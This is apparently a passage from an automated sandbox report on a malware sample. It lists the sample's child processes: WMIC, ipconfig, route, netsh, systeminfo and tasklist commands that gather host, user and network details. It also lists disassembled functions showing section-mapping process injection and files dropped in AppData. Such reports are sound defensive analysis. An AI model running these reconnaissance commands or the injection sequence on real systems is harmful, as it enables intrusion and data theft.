Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:39:25
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:39:27
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:39:29
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:39:32
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:39:40
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:39:44
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	09:39:54
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:40:01
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\hehcrfb
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hehcrfb
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	2A6994149BAFF1E680719F89062BFCC7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	09:40:01
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\fihcrfb
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\fihcrfb
Imagebase:	0x400000
File size:	245'248 bytes
MD5 hash:	D07C1E0124B1CFA23AA3699216AA912F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	09:40:10
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:40:14
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:40:19
Start date:	30/09/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /displaydns
Imagebase:	0x7ff628b60000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:40:20
Start date:	30/09/2024
Path:	C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):	false
Commandline:	route print
Imagebase:	0x7ff6f9970000
File size:	24'576 bytes
MD5 hash:	3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:40:22
Start date:	30/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall show state
Imagebase:	0x7ff7be450000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	09:40:26
Start date:	30/09/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7cc6f0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:40:38
Start date:	30/09/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /v /fo csv
Imagebase:	0x7ff760070000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	28.8%
Signature Coverage:	43.5%
Total number of Nodes:	170
Total number of Limit Nodes:	6

Executed Functions

Function 00418C80 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 310
libraryfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D9B
SetFocus.USER32(00000000), ref: 00418DA4
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418DAF
FindAtomW.KERNEL32(00000000), ref: 00418DB6
SearchPathA.KERNEL32(0041B3E4,0041B3CC,0041B3B8,00000000,?,?), ref: 00418DDA
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418DE2
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418DFA
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418E21
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418E2D
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418E43
GetEnvironmentStringsW.KERNEL32 ref: 00418E49
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418E8E
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418E9D
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418EA6
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418EBB
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418ECC
SetCommMask.KERNELBASE(00000000,00000000), ref: 00418EF5
GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418F0B
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418F3A
GetComputerNameW.KERNEL32(?,?), ref: 00418F4E
GetConsoleAliasExesLengthW.KERNEL32 ref: 00418F54
GetBinaryType.KERNEL32(0041B3F0,?), ref: 00418F66
PurgeComm.KERNEL32(00000000,00000000), ref: 00418F6E
LoadLibraryA.KERNELBASE(0041B410), ref: 00418FE2
MoveFileW.KERNEL32(00000000,00000000), ref: 00419017
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041903E

Strings

k`, xrefs: 0041901D
}$, xrefs: 00419045

Memory Dump Source

Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd

Similarity

API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
String ID: k`$}$
API String ID: 87775671-956986773
Opcode ID: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
Instruction ID: cec1c0038aff85c57551383c5b233afae2bf81415c058cacd0026c3a6edaf131
Opcode Fuzzy Hash: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
Instruction Fuzzy Hash: 02B1B671901224ABCB219F61DC44BDF7B79EF5D714F00806AF609A71A1DB381A85CFAE

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 0079273A Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00792762
Module32First.KERNEL32(00000000,00000224), ref: 00792782

Memory Dump Source

Source File: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 21dfb931feb32b98a10bef07665f1585c9260cbc2e2af594c4ea6864fea1566c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BAF06235500714BBEB203AF9B88DB6AB6ECAF49724F100528E746E11C1DA78E8464A61

Function 0216003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D

Strings

cess, xrefs: 0216018D
kernel32.dll, xrefs: 0216008F, 02160095

Memory Dump Source

Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

Function 00418940 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00514D70), ref: 00418A1F
GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418A5C
VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418A7B

Strings

, xrefs: 00418985

Memory Dump Source

Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
Instruction ID: 50ffa957652d6c793d686c1d0a186ca9e6a8cd8bf043fc734a0081a481964278
Opcode Fuzzy Hash: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
Instruction Fuzzy Hash: B4312918518680CAEB01DB78FC057923B66AB75709F04E1B8D14C8B7B1D7BB051E9B6A

Function 02160E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E

Memory Dump Source

Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

